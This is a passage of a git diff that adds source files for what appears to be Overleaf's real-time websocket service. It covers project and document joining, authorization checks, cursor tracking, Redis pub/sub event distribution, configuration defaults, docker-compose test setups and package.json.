} +} diff --git a/services/real-time/app/js/WebsocketController.js b/services/real-time/app/js/WebsocketController.js new file mode 100644 index 0000000..dec5677 --- /dev/null +++ b/services/real-time/app/js/WebsocketController.js @@ -0,0 +1,657 @@ +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const WebApiManager = require('./WebApiManager') +const AuthorizationManager = require('./AuthorizationManager') +const DocumentUpdaterManager = require('./DocumentUpdaterManager') +const ConnectedUsersManager = require('./ConnectedUsersManager') +const WebsocketLoadBalancer = require('./WebsocketLoadBalancer') +const RoomManager = require('./RoomManager') +const { + JoinLeaveEpochMismatchError, + NotAuthorizedError, + NotJoinedError, + ClientRequestedMissingOpsError, +} = require('./Errors') + +const JOIN_DOC_CATCH_UP_LENGTH_BUCKETS = [ + 0, 5, 10, 25, 50, 100, 150, 200, 250, 500, 1000, +] +const JOIN_DOC_CATCH_UP_AGE = [ + 0, + 1, + 2, + 5, + 10, + 20, + 30, + 60, + 120, + 240, + 600, + 60 * 60, + 24 * 60 * 60, +].map(x => x * 1000) + +let WebsocketController +module.exports = WebsocketController = { + // If the protocol version changes when the client reconnects, + // it will force a full refresh of the page. Useful for non-backwards + // compatible protocol changes. Use only in extreme need. + PROTOCOL_VERSION: 2, + + joinProject(client, user, projectId, callback) { + if (client.disconnected) { + metrics.inc('editor.join-project.disconnected', 1, { + status: 'immediately', + }) + return callback() + } + + const userId = user._id + logger.info( + { + userId, + projectId, + clientId: client.id, + remoteIp: client.remoteIp, + userAgent: client.userAgent, + }, + 'user joining project' + ) + metrics.inc('editor.join-project', 1, { status: client.transport }) + WebApiManager.joinProject( + projectId, + user, + function (error, project, privilegeLevel, userMetadata) { + if (error) { + return callback(error) + } + if (client.disconnected) { + logger.info( + { userId, projectId, clientId: client.id }, + 'client disconnected before joining project' + ) + metrics.inc('editor.join-project.disconnected', 1, { + status: 'after-web-api-call', + }) + return callback() + } + + if (!privilegeLevel) { + return callback(new NotAuthorizedError()) + } + + client.ol_context = {} + client.ol_context.privilege_level = privilegeLevel + client.ol_context.user_id = userId + client.ol_context.project_id = projectId + client.ol_context.owner_id = project.owner && project.owner._id + client.ol_context.first_name = user.first_name + client.ol_context.last_name = user.last_name + client.ol_context.email = user.email + client.ol_context.connected_time = new Date() + client.ol_context.signup_date = user.signUpDate + client.ol_context.login_count = user.loginCount + client.ol_context.is_restricted_user = !!userMetadata.isRestrictedUser + client.ol_context.is_token_member = !!userMetadata.isTokenMember + client.ol_context.is_invited_member = !!userMetadata.isInvitedMember + + RoomManager.joinProject(client, projectId, function (err) { + if (err) { + return callback(err) + } + logger.debug( + { + userId, + projectId, + clientId: client.id, + privilegeLevel, + userMetadata, + }, + 'user joined project' + ) + callback( + null, + project, + privilegeLevel, + WebsocketController.PROTOCOL_VERSION + ) + }) + + // No need to block for setting the user as connected in the cursor tracking + ConnectedUsersManager.updateUserPosition( + projectId, + client.publicId, + user, + null, + function (err) { + if (err) { + logger.warn( + { err, projectId, userId, clientId: client.id }, + 'background cursor update failed' + ) + } + } + ) + } + ) + }, + + // We want to flush a project if there are no more (local) connected clients + // but we need to wait for the triggering client to disconnect. How long we wait + // is determined by FLUSH_IF_EMPTY_DELAY. + FLUSH_IF_EMPTY_DELAY: 500, // ms + leaveProject(io, client, callback) { + const { project_id: projectId, user_id: userId } = client.ol_context + if (!projectId) { + return callback() + } // client did not join project + + metrics.inc('editor.leave-project', 1, { status: client.transport }) + logger.info( + { projectId, userId, clientId: client.id }, + 'client leaving project' + ) + WebsocketLoadBalancer.emitToRoom( + projectId, + 'clientTracking.clientDisconnected', + client.publicId + ) + + // We can do this in the background + ConnectedUsersManager.markUserAsDisconnected( + projectId, + client.publicId, + function (err) { + if (err) { + logger.error( + { err, projectId, userId, clientId: client.id }, + 'error marking client as disconnected' + ) + } + } + ) + + RoomManager.leaveProjectAndDocs(client) + setTimeout(function () { + const remainingClients = io.sockets.clients(projectId) + if (remainingClients.length === 0) { + // Flush project in the background + DocumentUpdaterManager.flushProjectToMongoAndDelete( + projectId, + function (err) { + if (err) { + logger.error( + { err, projectId, userId, clientId: client.id }, + 'error flushing to doc updater after leaving project' + ) + } + } + ) + } + callback() + }, WebsocketController.FLUSH_IF_EMPTY_DELAY) + }, + + joinDoc(client, docId, fromVersion, options, callback) { + if (client.disconnected) { + metrics.inc('editor.join-doc.disconnected', 1, { status: 'immediately' }) + return callback() + } + + const joinLeaveEpoch = ++client.joinLeaveEpoch + metrics.inc('editor.join-doc', 1, { status: client.transport }) + const { + project_id: projectId, + user_id: userId, + is_restricted_user: isRestrictedUser, + } = client.ol_context + if (!projectId) { + return callback(new NotJoinedError()) + } + logger.debug( + { userId, projectId, docId, fromVersion, clientId: client.id }, + 'client joining doc' + ) + + const emitJoinDocCatchUpMetrics = ( + status, + { firstVersionInRedis, version, ttlInS } + ) => { + if (fromVersion === -1) return // full joinDoc call + if (typeof options.age !== 'number') return // old frontend + if (!ttlInS) return // old document-updater pod + + const isStale = options.age > ttlInS * 1000 + const method = isStale ? 'stale' : 'recent' + metrics.histogram( + 'join-doc-catch-up-length', + version - fromVersion, + JOIN_DOC_CATCH_UP_LENGTH_BUCKETS, + { status, method, path: client.transport } + ) + if (firstVersionInRedis) { + metrics.histogram( + 'join-doc-catch-up-length-extra-needed', + firstVersionInRedis - fromVersion, + JOIN_DOC_CATCH_UP_LENGTH_BUCKETS, + { status, method, path: client.transport } + ) + } + metrics.histogram( + 'join-doc-catch-up-age', + options.age, + JOIN_DOC_CATCH_UP_AGE, + { status, path: client.transport } + ) + } + + WebsocketController._assertClientAuthorization( + client, + docId, + function (error) { + if (error) { + return callback(error) + } + if (client.disconnected) { + metrics.inc('editor.join-doc.disconnected', 1, { + status: 'after-client-auth-check', + }) + // the client will not read the response anyways + return callback() + } + if (joinLeaveEpoch !== client.joinLeaveEpoch) { + // another joinDoc or leaveDoc rpc overtook us + return callback(new JoinLeaveEpochMismatchError()) + } + // ensure the per-doc applied-ops channel is subscribed before sending the + // doc to the client, so that no events are missed. + RoomManager.joinDoc(client, docId, function (error) { + if (error) { + return callback(error) + } + if (client.disconnected) { + metrics.inc('editor.join-doc.disconnected', 1, { + status: 'after-joining-room', + }) + // the client will not read the response anyways + return callback() + } + + DocumentUpdaterManager.getDocument( + projectId, + docId, + fromVersion, + function (error, lines, version, ranges, ops, ttlInS) { + if (error) { + if (error instanceof ClientRequestedMissingOpsError) { + emitJoinDocCatchUpMetrics('missing', error.info) + } + return callback(error) + } + emitJoinDocCatchUpMetrics('success', { version, ttlInS }) + if (client.disconnected) { + metrics.inc('editor.join-doc.disconnected', 1, { + status: 'after-doc-updater-call', + }) + // the client will not read the response anyways + return callback() + } + + if (isRestrictedUser && ranges && ranges.comments) { + ranges.comments = [] + } + + // Encode any binary bits of data so it can go via WebSockets + // See http://ecmanaut.blogspot.co.uk/2006/07/encoding-decoding-utf8-in-javascript.html + const encodeForWebsockets = text => + unescape(encodeURIComponent(text)) + const escapedLines = [] + for (let line of lines) { + try { + line = encodeForWebsockets(line) + } catch (err) { + OError.tag(err, 'error encoding line uri component', { line }) + return callback(err) + } + escapedLines.push(line) + } + if (options.encodeRanges) { + try { + for (const comment of (ranges && ranges.comments) || []) { + if (comment.op.c) { + comment.op.c = encodeForWebsockets(comment.op.c) + } + } + for (const change of (ranges && ranges.changes) || []) { + if (change.op.i) { + change.op.i = encodeForWebsockets(change.op.i) + } + if (change.op.d) { + change.op.d = encodeForWebsockets(change.op.d) + } + } + } catch (err) { + OError.tag(err, 'error encoding range uri component', { + ranges, + }) + return callback(err) + } + } + + AuthorizationManager.addAccessToDoc(client, docId, () => {}) + logger.debug( + { + userId, + projectId, + docId, + fromVersion, + clientId: client.id, + }, + 'client joined doc' + ) + callback(null, escapedLines, version, ops, ranges) + } + ) + }) + } + ) + }, + + _assertClientAuthorization(client, docId, callback) { + // Check for project-level access first + AuthorizationManager.assertClientCanViewProject(client, function (error) { + if (error) { + return callback(error) + } + // Check for doc-level access next + AuthorizationManager.assertClientCanViewProjectAndDoc( + client, + docId, + function (error) { + if (error) { + // No cached access, check docupdater + const { project_id: projectId } = client.ol_context + DocumentUpdaterManager.checkDocument( + projectId, + docId, + function (error) { + if (error) { + return callback(error) + } else { + // Success + AuthorizationManager.addAccessToDoc(client, docId, callback) + } + } + ) + } else { + // Access already cached + callback() + } + } + ) + }) + }, + + leaveDoc(client, docId, callback) { + // client may have disconnected, but we have to cleanup internal state. + client.joinLeaveEpoch++ + metrics.inc('editor.leave-doc', 1, { status: client.transport }) + const { project_id: projectId, user_id: userId } = client.ol_context + logger.debug( + { userId, projectId, docId, clientId: client.id }, + 'client leaving doc' + ) + RoomManager.leaveDoc(client, docId) + // we could remove permission when user leaves a doc, but because + // the connection is per-project, we continue to allow access + // after the initial joinDoc since we know they are already authorised. + // # AuthorizationManager.removeAccessToDoc client, doc_id + callback() + }, + updateClientPosition(client, cursorData, callback) { + if (client.disconnected) { + // do not create a ghost entry in redis + return callback() + } + + metrics.inc('editor.update-client-position', 0.1, { + status: client.transport, + }) + const { + project_id: projectId, + first_name: firstName, + last_name: lastName, + email, + user_id: userId, + } = client.ol_context + logger.debug( + { userId, projectId, clientId: client.id, cursorData }, + 'updating client position' + ) + + AuthorizationManager.assertClientCanViewProjectAndDoc( + client, + cursorData.doc_id, + function (error) { + if (error) { + logger.debug( + { err: error, clientId: client.id, projectId, userId }, + "silently ignoring unauthorized updateClientPosition. Client likely hasn't called joinProject yet." + ) + return callback() + } + cursorData.id = client.publicId + if (userId) { + cursorData.user_id = userId + } + if (email) { + cursorData.email = email + } + // Don't store anonymous users in redis to avoid influx + if (!userId || userId === 'anonymous-user') { + cursorData.name = '' + // consistent async behaviour + setTimeout(callback) + } else { + cursorData.name = + firstName && lastName + ? `${firstName} ${lastName}` + : firstName || lastName || '' + ConnectedUsersManager.updateUserPosition( + projectId, + client.publicId, + { + first_name: firstName, + last_name: lastName, + email, + _id: userId, + }, + { + row: cursorData.row, + column: cursorData.column, + doc_id: cursorData.doc_id, + }, + callback + ) + } + WebsocketLoadBalancer.emitToRoom( + projectId, + 'clientTracking.clientUpdated', + cursorData + ) + } + ) + }, + + CLIENT_REFRESH_DELAY: 1000, + getConnectedUsers(client, callback) { + if (client.disconnected) { + // they are not interested anymore, skip the redis lookups + return callback() + } + + metrics.inc('editor.get-connected-users', { status: client.transport }) + const { + project_id: projectId, + user_id: userId, + is_restricted_user: isRestrictedUser, + } = client.ol_context + if (isRestrictedUser) { + return callback(null, []) + } + if (!projectId) { + return callback(new NotJoinedError()) + } + logger.debug( + { userId, projectId, clientId: client.id }, + 'getting connected users' + ) + AuthorizationManager.assertClientCanViewProject(client, function (error) { + if (error) { + return callback(error) + } + WebsocketLoadBalancer.emitToRoom(projectId, 'clientTracking.refresh') + setTimeout( + () => + ConnectedUsersManager.getConnectedUsers( + projectId, + function (error, users) { + if (error) { + return callback(error) + } + logger.debug( + { userId, projectId, clientId: client.id }, + 'got connected users' + ) + callback(null, users) + } + ), + WebsocketController.CLIENT_REFRESH_DELAY + ) + }) + }, + + applyOtUpdate(client, docId, update, callback) { + // client may have disconnected, but we can submit their update to doc-updater anyways. + const { user_id: userId, project_id: projectId } = client.ol_context + if (!projectId) { + return callback(new NotJoinedError()) + } + + WebsocketController._assertClientCanApplyUpdate( + client, + docId, + update, + function (error) { + if (error) { + setTimeout( + () => + // Disconnect, but give the client the chance to receive the error + client.disconnect(), + 100 + ) + return callback(error) + } + if (!update.meta) { + update.meta = {} + } + update.meta.source = client.publicId + update.meta.user_id = userId + update.meta.tsRT = performance.now() + metrics.inc('editor.doc-update', 0.3, { status: client.transport }) + + logger.debug( + { + userId, + docId, + projectId, + clientId: client.id, + version: update.v, + }, + 'sending update to doc updater' + ) + + DocumentUpdaterManager.queueChange( + projectId, + docId, + update, + function (error) { + if ((error && error.message) === 'update is too large') { + metrics.inc('update_too_large') + const { updateSize } = error.info + logger.warn( + { userId, projectId, docId, updateSize }, + 'update is too large' + ) + + // mark the update as received -- the client should not send it again! + callback() + + // trigger an out-of-sync error + const message = { + project_id: projectId, + doc_id: docId, + error: 'update is too large', + } + setTimeout(function () { + if (client.disconnected) { + // skip the message broadcast, the client has moved on + return metrics.inc('editor.doc-update.disconnected', 1, { + status: 'at-otUpdateError', + }) + } + client.emit('otUpdateError', message.error, message) + client.disconnect() + }, 100) + return + } + + if (error) { + OError.tag(error, 'document was not available for update', { + version: update.v, + }) + client.disconnect() + } + callback(error) + } + ) + } + ) + }, + + _assertClientCanApplyUpdate(client, docId, update, callback) { + if (WebsocketController._isCommentUpdate(update)) { + return AuthorizationManager.assertClientCanViewProjectAndDoc( + client, + docId, + callback + ) + } else if (update.meta?.tc) { + return AuthorizationManager.assertClientCanReviewProjectAndDoc( + client, + docId, + callback + ) + } else { + return AuthorizationManager.assertClientCanEditProjectAndDoc( + client, + docId, + callback + ) + } + }, + + _isCommentUpdate(update) { + if (!(update && update.op instanceof Array)) { + return false + } + for (const op of update.op) { + if (!op.c) { + return false + } + } + return true + }, +} diff --git a/services/real-time/app/js/WebsocketLoadBalancer.js b/services/real-time/app/js/WebsocketLoadBalancer.js new file mode 100644 index 0000000..ebf20fa --- /dev/null +++ b/services/real-time/app/js/WebsocketLoadBalancer.js @@ -0,0 +1,251 @@ +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const RedisClientManager = require('./RedisClientManager') +const SafeJsonParse = require('./SafeJsonParse') +const EventLogger = require('./EventLogger') +const HealthCheckManager = require('./HealthCheckManager') +const RoomManager = require('./RoomManager') +const ChannelManager = require('./ChannelManager') +const ConnectedUsersManager = require('./ConnectedUsersManager') + +const RESTRICTED_USER_MESSAGE_TYPE_PASS_LIST = [ + 'otUpdateApplied', + 'otUpdateError', + 'joinDoc', + 'reciveNewDoc', + 'reciveNewFile', + 'reciveNewFolder', + 'reciveEntityMove', + 'reciveEntityRename', + 'removeEntity', + 'accept-changes', + 'projectNameUpdated', + 'rootDocUpdated', + 'toggle-track-changes', + 'projectRenamedOrDeletedByExternalSource', +] +const BANDWIDTH_BUCKETS = [0] +// 64 bytes ... 8MB +for (let i = 5; i <= 22; i++) { + BANDWIDTH_BUCKETS.push(2 << i) +} + +let WebsocketLoadBalancer +module.exports = WebsocketLoadBalancer = { + rclientPubList: RedisClientManager.createClientList(Settings.redis.pubsub), + rclientSubList: RedisClientManager.createClientList(Settings.redis.pubsub), + + shouldDisconnectClient(client, message) { + const userId = client.ol_context.user_id + if (message?.message === 'userRemovedFromProject') { + if (message?.payload?.includes(userId)) { + return true + } + } else if (message?.message === 'project:publicAccessLevel:changed') { + const [info] = message.payload + if ( + info.newAccessLevel === 'private' && + !client.ol_context.is_invited_member + ) { + return true + } + } else if (message?.message === 'project:collaboratorAccessLevel:changed') { + const changedUserId = message.payload[0].userId + return userId === changedUserId + } + return false + }, + + emitToRoom(roomId, message, ...payload) { + if (!roomId) { + logger.warn( + { message, payload }, + 'no room_id provided, ignoring emitToRoom' + ) + return + } + const data = JSON.stringify({ + room_id: roomId, + message, + payload, + }) + logger.debug( + { roomId, message, payload, length: data.length }, + 'emitting to room' + ) + + this.rclientPubList.map(rclientPub => + ChannelManager.publish(rclientPub, 'editor-events', roomId, data) + ) + }, + + emitToAll(message, ...payload) { + this.emitToRoom('all', message, ...payload) + }, + + listenForEditorEvents(io) { + logger.debug( + { rclients: this.rclientSubList.length }, + 'listening for editor events' + ) + for (const rclientSub of this.rclientSubList) { + rclientSub.subscribe('editor-events') + rclientSub.on('message', function (channel, message) { + if (Settings.debugEvents > 0) { + EventLogger.debugEvent(channel, message) + } + WebsocketLoadBalancer._processEditorEvent(io, channel, message) + }) + } + this.handleRoomUpdates(this.rclientSubList) + }, + + handleRoomUpdates(rclientSubList) { + const roomEvents = RoomManager.eventSource() + roomEvents.on('project-active', function (projectId) { + const subscribePromises = rclientSubList.map(rclient => + ChannelManager.subscribe(rclient, 'editor-events', projectId) + ) + RoomManager.emitOnCompletion( + subscribePromises, + `project-subscribed-${projectId}` + ) + }) + roomEvents.on('project-empty', projectId => + rclientSubList.map(rclient => + ChannelManager.unsubscribe(rclient, 'editor-events', projectId) + ) + ) + }, + + _processEditorEvent(io, channel, message) { + SafeJsonParse.parse(message, function (error, message) { + if (error) { + logger.error({ err: error, channel }, 'error parsing JSON') + return + } + if (message.room_id === 'all') { + io.sockets.emit(message.message, ...message.payload) + } else if ( + message.message === 'clientTracking.refresh' && + message.room_id + ) { + const clientList = io.sockets.clients(message.room_id) + logger.debug( + { + channel, + message: message.message, + roomId: message.room_id, + messageId: message._id, + socketIoClients: clientList.map(client => client.id), + }, + 'refreshing client list' + ) + for (const client of clientList) { + ConnectedUsersManager.refreshClient(message.room_id, client.publicId) + } + } else if (message.message === 'canary-applied-op') { + const { ack, broadcast, source, projectId, docId } = message.payload + + const estimateBandwidth = (room, path) => { + const seen = new Set() + for (const client of io.sockets.clients(room)) { + if (seen.has(client.id)) continue + seen.add(client.id) + let v = client.id === source ? ack : broadcast + if (v === 0) { + // Acknowledgements with update.dup===true will not get sent to other clients. + continue + } + v += `5:::{"name":"otUpdateApplied","args":[]}`.length + Metrics.histogram( + 'estimated-applied-ops-bandwidth', + v, + BANDWIDTH_BUCKETS, + { path } + ) + } + } + + estimateBandwidth(projectId, 'per-project') + estimateBandwidth(docId, 'per-doc') + } else if (message.room_id) { + if (message._id && Settings.checkEventOrder) { + const status = EventLogger.checkEventOrder( + 'editor-events', + message._id, + message + ) + if (status === 'duplicate') { + return // skip duplicate events + } + } + + const isRestrictedMessage = + !RESTRICTED_USER_MESSAGE_TYPE_PASS_LIST.includes(message.message) + + // send messages only to unique clients (due to duplicate entries in io.sockets.clients) + const clientList = io.sockets.clients(message.room_id) + + // avoid unnecessary work if no clients are connected + if (clientList.length === 0) { + return + } + logger.debug( + { + channel, + message: message.message, + roomId: message.room_id, + messageId: message._id, + socketIoClients: clientList.map(client => client.id), + }, + 'distributing event to clients' + ) + const seen = new Map() + for (const client of clientList) { + if (!seen.has(client.id)) { + seen.set(client.id, true) + if (WebsocketLoadBalancer.shouldDisconnectClient(client, message)) { + logger.debug( + { + message, + userId: client?.ol_context?.user_id, + projectId: client?.ol_context?.project_id, + }, + 'disconnecting client' + ) + if ( + message?.message !== 'project:collaboratorAccessLevel:changed' + ) { + client.emit('project:access:revoked') + } + client.disconnect() + } else { + if (isRestrictedMessage && client.ol_context.is_restricted_user) { + // hide restricted message + logger.debug( + { + message, + clientId: client.id, + userId: client.ol_context.user_id, + projectId: client.ol_context.project_id, + }, + 'hiding restricted message from client' + ) + } else { + client.emit(message.message, ...message.payload) + } + } + } + } + } else if (message.health_check) { + logger.debug( + { message }, + 'got health check message in editor events channel' + ) + HealthCheckManager.check(channel, message.key) + } + }) + }, +} diff --git a/services/real-time/buildscript.txt b/services/real-time/buildscript.txt new file mode 100644 index 0000000..292fde8 --- /dev/null +++ b/services/real-time/buildscript.txt @@ -0,0 +1,9 @@ +real-time +--dependencies=redis +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/services/real-time/config/settings.defaults.js b/services/real-time/config/settings.defaults.js new file mode 100644 index 0000000..57b0a50 --- /dev/null +++ b/services/real-time/config/settings.defaults.js @@ -0,0 +1,180 @@ +/* eslint-disable camelcase */ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +const settings = { + redis: { + pubsub: { + host: + process.env.PUBSUB_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + port: process.env.PUBSUB_REDIS_PORT || process.env.REDIS_PORT || '6379', + password: + process.env.PUBSUB_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.PUBSUB_REDIS_MAX_RETRIES_PER_REQUEST || + process.env.REDIS_MAX_RETRIES_PER_REQUEST || + '20' + ), + }, + + realtime: { + host: + process.env.REAL_TIME_REDIS_HOST || + process.env.REDIS_HOST || + '127.0.0.1', + port: + process.env.REAL_TIME_REDIS_PORT || process.env.REDIS_PORT || '6379', + password: + process.env.REAL_TIME_REDIS_PASSWORD || + process.env.REDIS_PASSWORD || + '', + key_schema: { + clientsInProject({ project_id }) { + return `clients_in_project:{${project_id}}` + }, + connectedUser({ project_id, client_id }) { + return `connected_user:{${project_id}}:${client_id}` + }, + projectNotEmptySince({ projectId }) { + return `projectNotEmptySince:{${projectId}}` + }, + }, + maxRetriesPerRequest: parseInt( + process.env.REAL_TIME_REDIS_MAX_RETRIES_PER_REQUEST || + process.env.REDIS_MAX_RETRIES_PER_REQUEST || + '20' + ), + }, + + documentupdater: { + host: + process.env.DOC_UPDATER_REDIS_HOST || + process.env.REDIS_HOST || + '127.0.0.1', + port: + process.env.DOC_UPDATER_REDIS_PORT || process.env.REDIS_PORT || '6379', + password: + process.env.DOC_UPDATER_REDIS_PASSWORD || + process.env.REDIS_PASSWORD || + '', + key_schema: { + pendingUpdates({ doc_id }) { + return `PendingUpdates:{${doc_id}}` + }, + }, + maxRetriesPerRequest: parseInt( + process.env.DOC_UPDATER_REDIS_MAX_RETRIES_PER_REQUEST || + process.env.REDIS_MAX_RETRIES_PER_REQUEST || + '20' + ), + }, + + websessions: { + host: + process.env.SESSIONS_REDIS_HOST || + process.env.REDIS_HOST || + '127.0.0.1', + port: process.env.SESSIONS_REDIS_PORT || process.env.REDIS_PORT || '6379', + password: + process.env.SESSIONS_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.SESSIONS_REDIS_MAX_RETRIES_PER_REQUEST || + process.env.REDIS_MAX_RETRIES_PER_REQUEST || + '20' + ), + }, + }, + + internal: { + realTime: { + port: 3026, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + apis: { + web: { + url: `http://${ + process.env.WEB_API_HOST || process.env.WEB_HOST || '127.0.0.1' + }:${process.env.WEB_API_PORT || process.env.WEB_PORT || 3000}`, + user: process.env.WEB_API_USER || 'overleaf', + pass: process.env.WEB_API_PASSWORD || 'password', + }, + documentupdater: { + url: `http://${ + process.env.DOCUMENT_UPDATER_HOST || + process.env.DOCUPDATER_HOST || + '127.0.0.1' + }:3003`, + }, + }, + + security: { + sessionSecret: process.env.SESSION_SECRET, + sessionSecretUpcoming: process.env.SESSION_SECRET_UPCOMING, + sessionSecretFallback: process.env.SESSION_SECRET_FALLBACK, + }, + + cookieName: process.env.COOKIE_NAME || 'overleaf.sid', + + // Expose the hostname in the `debug.getHostname` rpc + exposeHostname: process.env.EXPOSE_HOSTNAME === 'true', + + max_doc_length: 2 * 1024 * 1024, // 2mb + + // should be set to the same same as dispatcherCount in document updater + pendingUpdateListShardCount: parseInt( + process.env.PENDING_UPDATE_LIST_SHARD_COUNT || 10, + 10 + ), + + // combine + // max_doc_length (2mb see above) * 2 (delete + insert) + // max_ranges_size (3mb see MAX_RANGES_SIZE in document-updater) + // overhead for JSON serialization + maxUpdateSize: + parseInt(process.env.MAX_UPDATE_SIZE) || 7 * 1024 * 1024 + 64 * 1024, + + shutdownDrainTimeWindow: process.env.SHUTDOWN_DRAIN_TIME_WINDOW || 9, + + // The shutdown procedure asks clients to reconnect gracefully. + // 3rd-party/buggy clients may not act upon receiving the message and keep + // stale connections alive. We forcefully disconnect them after X ms: + gracefulReconnectTimeoutMs: + parseInt(process.env.GRACEFUL_RECONNECT_TIMEOUT_MS, 10) || + // The frontend allows actively editing users to keep the connection open + // for up-to ConnectionManager.MAX_RECONNECT_GRACEFULLY_INTERVAL=45s + // Permit an extra delay to account for slow/flaky connections. + (45 + 30) * 1000, + + continualPubsubTraffic: process.env.CONTINUAL_PUBSUB_TRAFFIC || false, + + checkEventOrder: process.env.CHECK_EVENT_ORDER || false, + + publishOnIndividualChannels: + process.env.PUBLISH_ON_INDIVIDUAL_CHANNELS || false, + + statusCheckInterval: parseInt(process.env.STATUS_CHECK_INTERVAL || '0'), + + // The deployment colour for this app (if any). Used for blue green deploys. + deploymentColour: process.env.DEPLOYMENT_COLOUR, + // Load balancer health checks will return 200 only when this file contains + // the deployment colour for this app. + deploymentFile: process.env.DEPLOYMENT_FILE, + + errors: { + catchUncaughtErrors: true, + shutdownOnUncaughtError: true, + }, + + behindProxy: process.env.BEHIND_PROXY === 'true', + trustedProxyIps: process.env.TRUSTED_PROXY_IPS, + keepAliveTimeoutMs: parseInt(process.env.KEEPALIVE_TIMEOUT_MS ?? '5000', 10), + allowedCorsOrigins: process.env.REAL_TIME_ALLOWED_CORS_ORIGINS, +} + +// console.log settings.redis +module.exports = settings diff --git a/services/real-time/config/settings.test.js b/services/real-time/config/settings.test.js new file mode 100644 index 0000000..e74a6fb --- /dev/null +++ b/services/real-time/config/settings.test.js @@ -0,0 +1,11 @@ +module.exports = { + errors: { + catchUncaughtErrors: false, + }, + + security: { + sessionSecret: 'static-secret-for-tests', + sessionSecretFallback: 'static-secret-fallback-for-tests', + sessionSecretUpcoming: 'static-secret-upcoming-for-tests', + }, +} diff --git a/services/real-time/docker-compose.ci.yml b/services/real-time/docker-compose.ci.yml new file mode 100644 index 0000000..9011627 --- /dev/null +++ b/services/real-time/docker-compose.ci.yml @@ -0,0 +1,51 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + redis: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + redis: + image: redis + healthcheck: + test: ping="$$(redis-cli ping)" && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + diff --git a/services/real-time/docker-compose.yml b/services/real-time/docker-compose.yml new file mode 100644 index 0000000..d40fada --- /dev/null +++ b/services/real-time/docker-compose.yml @@ -0,0 +1,54 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/real-time + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/real-time + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/real-time + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/real-time + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + redis: + condition: service_healthy + command: npm run --silent test:acceptance + + redis: + image: redis + healthcheck: + test: ping=$$(redis-cli ping) && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + diff --git a/services/real-time/package.json b/services/real-time/package.json new file mode 100644 index 0000000..2d5f87a --- /dev/null +++ b/services/real-time/package.json @@ -0,0 +1,52 @@ +{ + "name": "@overleaf/real-time", + "description": "The socket.io layer of Overleaf for real-time editor interactions", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "base64id": "0.1.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "connect-redis": "^6.1.3", + "cookie-parser": "^1.4.6", + "express": "^4.21.2", + "express-session": "^1.17.1", + "joi": "^17.12.0", + "lodash": "^4.17.21", + "proxy-addr": "^2.0.7", + "request": "^2.88.2", + "socket.io": "github:overleaf/socket.io#0.9.19-overleaf-11", + "socket.io-client": 